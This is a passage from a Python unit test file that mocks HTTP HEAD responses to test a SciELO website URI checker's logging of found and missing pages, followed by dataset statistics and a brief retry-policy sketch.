"/scielo.php?script=sci_issues&pid=0001-3765\n"
"/scielo.php?script=sci_issuetoc&pid=0001-376520200005\n"
"/scielo.php?script=sci_arttext&pid=S0001-37652020000501101\n"
).split()
mock_head.side_effect = [
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
]
uri_list_file_path = "/tmp/uri_list_2010-10-09.lst"
website_url_list = ["http://www.scielo.br", "https://newscielo.br"]
check_website_uri_list(uri_list_file_path, website_url_list)
self.assertEqual(
mock_info.call_args_list,
[
call('Quantidade de URI: %i', 8),
call("Encontrados: %i/%i", 8, 8),
]
)
@patch("operations.check_website_operations.Logger.info")
@patch("operations.check_website_operations.requests.head")
@patch("operations.check_website_operations.read_file")
def test_check_website_uri_list_informs_that_some_of_uri_items_were_not_found(self, mock_read_file, mock_head, mock_info):
mock_read_file.return_value = (
"/scielo.php?script=sci_serial&pid=0001-3765\n"
"/scielo.php?script=sci_issues&pid=0001-3765\n"
"/scielo.php?script=sci_issuetoc&pid=0001-376520200005\n"
"/scielo.php?script=sci_arttext&pid=S0001-37652020000501101\n"
).split()
mock_head.side_effect = [
MockResponse(200),
MockResponse(404),
MockResponse(200),
MockResponse(200),
MockResponse(500),
MockResponse(404),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
]
uri_list_file_path = "/tmp/uri_list_2010-10-09.lst"
website_url_list = ["http://www.scielo.br", "https://newscielo.br"]
check_website_uri_list(uri_list_file_path, website_url_list)
bad_uri_1 = "http://www.scielo.br/scielo.php?script=sci_issues&pid=0001-3765"
bad_uri_2 = "https://newscielo.br/scielo.php?script=sci_serial&pid=0001-3765"
self.assertEqual(
mock_info.call_args_list,
[
call('Quantidade de URI: %i', 8),
call("Retry to access '%s' after %is", bad_uri_2, 5),
call("The URL '%s' returned the status code '%s' after %is",
bad_uri_2, 404, 5),
call("Não encontrados (%i/%i):\n%s", 2, 8,
"\n".join([
bad_uri_1,
bad_uri_2,
])),
]
)
| 38.442982 | 126 | 0.649287 | 1,079 | 8,765 | 4.861909 | 0.125116 | 0.081395 | 0.075486 | 0.109798 | 0.817003 | 0.813191 | 0.801182 | 0.774495 | 0.760579 | 0.760579 | 0 | 0.04892 | 0.244381 | 8,765 | 227 | 127 | 38.612335 | 0.743168 | 0 | 0 | 0.54359 | 0 | 0.005128 | 0.220878 | 0.152082 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.097436 | false | 0 | 0.020513 | 0 | 0.14359 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
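The retry tests above imply a loop that re-issues HEAD requests while the status code is retriable (429 or 5xx), sleeping for the durations yielded by retry_after(), and gives up once the delays run out. A minimal sketch of that policy under those assumptions; it is not the actual implementation in check_website_operations:

import time
import requests

RETRIABLE_STATUS_CODES = {429, 500, 502, 503, 504}

def head_with_retries(uri, retry_after):
    # First attempt, then one retry per delay while the response stays retriable.
    response = requests.head(uri)
    for delay in retry_after():
        if response.status_code not in RETRIABLE_STATUS_CODES:
            break
        time.sleep(delay)
        response = requests.head(uri)
    return response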